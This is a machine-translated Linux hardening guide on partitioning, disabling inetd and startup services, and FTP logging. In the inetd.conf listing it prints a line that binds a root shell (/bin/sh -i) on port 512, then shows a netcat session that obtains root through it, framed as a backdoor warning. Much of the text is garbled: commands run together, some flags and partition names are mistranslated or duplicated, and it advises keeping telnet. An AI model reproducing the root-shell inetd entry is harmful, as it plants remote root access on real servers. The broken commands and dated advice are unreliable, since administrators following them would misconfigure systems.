Linux Security Strategy

Article Title: linux security strategy. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
The purpose of this article is to give readers a general understanding of linux security configurations, in fact, I think it will take minutes for linux machines to perform general security configurations.
　　
　　
1. Install
Everyone is familiar with the installation process. First of all, isolate the network for system installation. Of course, choose custom to install the required software package.
Hard Disk Partition: if you use the root partition to record data, such as log files and emails, a large number of logs or spam may be generated due to denial of service. Cause system crash. Therefore, we recommend that you create separate partitions for/var to store logs and emails to avoid overflow of the root partition. It is best to separate a partition for a special application, especially for programs that can generate a large number of logs. We also recommend that you separate a partition for/home so that they cannot fill up/partition, the following are the partitions on my hard disk:
/Root
/Var log
/Hacking
Swap not much
/Home
After the system is installed and restarted, it is best to install the corresponding system security patch. Please make good use of it. Remember, you are not installing 98 in your own house, you have installed a linux server. For the redhat system, you can find the patch at: http://www.redhat.com/corp/support/errata.
In Versions later than redhat6.1, the tool up2date is provided to determine which rpm packages need to be upgraded, and then automatically download and install the packages from the redhat site.
2. Disable the service.
Well, it's unrealistic to say that your system is absolutely secure, that is, to cut off the network cable, it is necessary to disable unnecessary services because some services may cause trouble to your system.
By default, linux is a powerful system that runs many services. However, there are many services that are not needed and are prone to security risks. The first file is/etc/inetd. conf, which defines the services to be listened to by/usr/sbin/inetd. You may only need two of them: telnet and ftp, and many others, such as popd, both imapd and rsh may cause security problems. Use the following command to display services that are not commented out:
Suneagle # grep-v "#"/etc/inetd. conf
Ftp stream tcp nowait root/usr/sbin/tcpd in. ftpd-l-
Telnet stream tcp nowait root/usr/sbin/tcpd in. telnetd
Shell stream tcp nowait root/usr/sbin/tcpd in. rshd
Login stream tcp nowait root/usr/sbin/tcpd in. rlogind
Talk dgram udp wait nobody. tty/usr/sbin/tcpd in. talkd
Ntalk dgram udp wait nobody. tty/usr/sbin/tcpd in. ntalkd
Pop-3 stream tcp nowait root/usr/sbin/tcpd ipop3d
Imap stream tcp nowait root/usr/sbin/tcpd imapd
Finger stream tcp nowait nobody/usr/sbin/tcpd in. fingerd
Linuxconf stream tcp wait root/bin/linuxconf -- http
Exec stream tcp nowait root/bin/sh-I
Haha, do you think that the last line will not be bound with a rootshell? What are the consequences? Run the following command on a remote win2000 machine:
E: \ cmd> nc 192.0.0.88 512
Bash # id
Id
Uid = 0 (root) gid = 0 (root) groups = 0 (root)
Bash #
Do you know? Hey, everyone's attention * ^_^ *
I have written an article about using this file to bind a backdoor. It is very aggressive. This command can help you find out if there is a backdoor.
The following is the. rc Script, which determines the services to be started by the init process. In the redhat system, these scripts are in/etc/rc. d/rc3.d (if your system starts with x by default, it is/etc/rc. d/rc5.d ). To disable a service at startup, you only need to replace uppercase S with lowercase s. At the same time, redhat also provides a tool to help you disable the service, enter/usr/sbin/setup, and then select "system services" to customize the services that the system runs at startup. Another option is the chkconfig command.
All of them come with this tool. The numbers in the script name are in the starting order. The numbers starting with an uppercase key are used to kill the process. The following are some major services:
S05apmd notebook required
S10xntpd Network Time Protocol
Required for S11portmap to run the rpc service
S15sound sound card
S15netfs nfs client
S20rstatd avoids running the r service. remote users can obtain a lot of information from it.
S20rusersd
S20rwhod
S20rwalld
S20bootparamd diskless workstation
S25squid proxy service
S34yppasswdd NIS server, which has many vulnerabilities
S35ypserv NIS server, which has many vulnerabilities
S35dhcpd dhcp Service
S40atd and cron are similar to scheduled program services.
S45pcmcia pcmcia card, notebook
S50snmpd SNMP allows remote users to obtain many system information
S55named DNS Service
S55routed RIP. Don't run it if you don't need it.
S60lpd Printing Service
S60mars-nwe Netware file and print services
S60nfs NFS server with many vulnerabilities
S72amd automount, remote mount
S75gated is another routing service, such as OSPF.
The S80sendmail mail service can still send emails if it is disabled, but cannot receive or relay messages.
S85httpd web Server
S87ypbind NIS client
S90xfs X font Server
S95innd News Server
Familiar with Slinuxconf.
Run this command to check how many services are running before closing the startup script:
Suneagle # ps-eaf | wc-l
54
There are 54 types of services in my system. When you close some services, run the above command again to see how many services are missing. The fewer services you run, the safer the system is. Run the following command to check which services are running:
Suneagle # netstat-na -- ip
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
Tcp 0 136 192.0.0.88: 23 192.0.0.5: 1236 ESTABLISHED
Tcp 0 0 192.0.0.88: 23 192.0.0.8: 1113 ESTABLISHED
Tcp 0 0 192.0.0.88: 139 192.0.0.8: 1112 ESTABLISHED
Tcp 0 0 192.0.0.88: 1024 61.153.17.24: 23 ESTABLISHED
Tcp 0 0 192.0.0.88: 23 192.0.0.8: 1084 ESTABLISHED
Tcp 0 0 0.0.0.0: 139 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 80 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 25 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 515 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 512 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 98 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 79 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 143 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 110 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 513 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 514 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 23 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 21 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 113 0.0.0.0: * LISTEN
Tcp 0 0 0.0.0.0: 111 0.0.0.0: * LISTEN
Udp 0 0 127.0.0.1: 1024 0.0.0.0 :*
Udp 0 0 192.0.0.88: 138 0.0.0.0 :*
Udp 0 0 192.0.0.88: 137 0.0.0.0 :*
Udp 0 0 0.0.0.0: 138 0.0.0.0 :*
Udp 0 0 0.0.0.0: 137 0.0.0.0 :*
Udp 0 0 0.0.0.0: 518 0.0.0.0 :*
Udp 0 0 0.0.0.0: 517 0.0.0.0 :*
Udp 0 0 0.0.0.0: 111 0.0.0.0 :*
Raw 0 0 0.0.0.0: 1 0.0.0.0: * 7
Raw 0 0 0.0.0.0: 6 0.0.0.0: * 7
Well, I opened a lot of dangerous ports for testing this system. Well, you don't want to learn about me. It's time to close it. Haha.
3. log record and Enhancement
After some unnecessary services are disabled, logs are also a concern for us. The configured unix system logs are very powerful and can even make traps. I can write a long story about logs, I will not elaborate on the log principles here. If you are interested, you can refer to the relevant materials or read my other article "solaris System Log principles". Good! All logs are under/var/log (for linux systems only). By default, linux logs are very powerful, except for ftp. However, we can modify/etc/ftpaccess or/etc/inetd. conf to ensure that every ftp connection log can be recorded. The following is an example of modifying inetd. conf:
Ftp stream tcp nowait root/usr/sbin/tcpd in. ftpd-l-L-I-o
-L each ftp connection is written to syslog
-L record every user command
-I file stored ed, record to xferlog
-O file transmitted, record to xferlog